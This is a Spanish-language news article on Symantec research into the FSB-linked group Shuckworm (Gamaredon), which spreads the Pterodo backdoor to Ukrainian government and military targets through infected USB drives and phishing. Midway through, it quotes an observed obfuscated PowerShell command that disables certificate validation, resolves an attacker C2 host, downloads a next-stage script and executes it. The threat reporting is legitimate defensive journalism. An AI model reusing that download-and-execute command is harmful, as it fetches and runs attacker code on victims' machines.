Hackers rusos están utilizando un nuevo malware para implantar puertas traseras
Hackers que trabajan para el Servicio de Seguridad Federal de Rusia han montado múltiples ataques cibernéticos que utilizan malware basado en USB para robar grandes cantidades de datos de objetivos ucranianos. El propósito es usar los datos en su invasión en curso de su vecino más pequeño, según afirmaron los investigadores.
“Los sectores y la naturaleza de las organizaciones y máquinas objetivo pueden haber dado a los atacantes acceso a cantidades significativas de información confidencial. Hubo indicios en algunas organizaciones de que los atacantes estaban en las máquinas de los departamentos de recursos humanos de las organizaciones, lo que indica que la información sobre las personas que trabajan en las diversas organizaciones era una prioridad para los atacantes, entre otras cosas”.
Investigadores de Symantec
El grupo, que Symantec ha identicado como Shuckworm y otros investigadores llaman Gamaredon y Armageddon, ha estado activo desde 2014. Estos hackers han estado vinculados al FSB de Rusia, el principal servicio de seguridad de ese país. El grupo se enfoca únicamente en obtener inteligencia sobre objetivos ucranianos. En 2020, los investigadores de la firma de seguridad SentinelOne dijeron que el grupo de hackers había “atacado a más de 5000 entidades individuales en Ucrania, con un enfoque particular en las áreas donde están desplegadas las tropas ucranianas”.
En febrero, Shuckworm comenzó a implementar una nueva infraestructura de comando y control (C2) de malware que ha penetrado con éxito las defensas de múltiples organizaciones ucranianas en el ejército, los servicios de seguridad y el gobierno de ese país. Los miembros del grupo parecen más interesados en obtener información relacionada con información militar confidencial que podría ser objeto de abuso en la invasión en curso de Rusia.
Nuevo malware
Esta nueva campaña presentó un nuevo malware en forma de un script de PowerShell que propaga Pterodo, una puerta trasera creada por Shuckworm. El script se activa cuando las unidades USB infectadas se conectan a las computadoras objetivo. El script malicioso primero se copia a sí mismo en la máquina de destino para crear un archivo de acceso directo con la extensión rtf.lnk. Los archivos tienen nombres como video_porn.rtf.lnk, do_not_delete.rtf.lnk, y evidence.rtf.lnk.. Los nombres, que en su mayoría están en ucraniano, son un intento de atraer a los objetivos para que abran los archivos para que instalen Pterodo en las máquinas.
“Es probable que los atacantes utilicen estas unidades USB para el movimiento lateral a través de las redes de las víctimas y pueden usarse para ayudar a los atacantes a llegar a las máquinas con espacio de aire dentro de las organizaciones objetivo”.
El script continúa enumerando todas las unidades conectadas a la computadora de destino y se copia a sí mismo en todas las unidades extraíbles adjuntas, muy probablemente con la esperanza de infectar cualquier dispositivo con espacio de aire, que intencionalmente no está conectado a Internet en un intento de evitar que sea hackeado
Para cubrir sus huellas, Shuckworm ha creado docenas de variantes y ha rotado rápidamente las direcciones IP y la infraestructura que usa para comando y control. El grupo también utiliza servicios legítimos como Telegram y su plataforma de microblogging Telegraph para comando y control en otro intento de evitar la detección.
Shuckworm generalmente usa correos electrónicos de phishing como un vector inicial en las computadoras de los objetivos. Los correos electrónicos contienen archivos adjuntos maliciosos que se hacen pasar por archivos con extensiones, incluidas .docx, .rar, .sfx, lnk y hta. Estos correos electrónicos a menudo usan temas como conflictos armados, procesos penales, lucha contra el crimen y protección de los niños como señuelos para lograr que los objetivos abran los correos electrónicos y hagan clic en los archivos adjuntos.
Investigación
Los investigadores de Symantec dijeron que una computadora infectada que recuperaron en la campaña era típica por la forma en que funciona. Ellos escribieron:
En una víctima, la primera señal de actividad maliciosa fue cuando el usuario pareció abrir un archivo RAR que probablemente se envió a través de un correo electrónico de phishing y que contenía un documento malicioso.
Después de abrir el documento, se observó que se ejecutaba un comando malicioso de PowerShell para descargar el payload de la siguiente etapa del servidor C2 de los atacantes:
"CSIDL_SYSTEM\cmd.exe" /c start /min "" powershell -w hidden
"$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(new-object
net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloads
tring($faddr);iex $text"Más recientemente, Symantec ha observado que Shuckworm aprovecha más direcciones IP en sus scripts de PowerShell. Este es probablemente un intento de evadir algunos métodos de seguimiento empleados por los investigadores.
Shuckworm también continúa actualizando las técnicas de ofuscación utilizadas en sus scripts de PowerShell en un intento de evitar la detección, con hasta 25 nuevas variantes de los scripts del grupo observadas por mes entre enero y abril de 2023.
Datos relevantes
La publicación sobre la investigación incluye direcciones IP, hash, nombres de archivos y otros indicadores de compromiso que las personas pueden usar para detectar si han sido atacadas. La publicación también advierte que el grupo representa una amenaza que los objetivos deben tomar en serio.
“Esta actividad demuestra que el enfoque implacable de Shuckworm en Ucrania continúa. Parece claro que los grupos de ataque rusos respaldados por estados-nación continúan apuntando con láser a los objetivos ucranianos en un intento de encontrar datos que puedan ayudar a sus operaciones militares”.
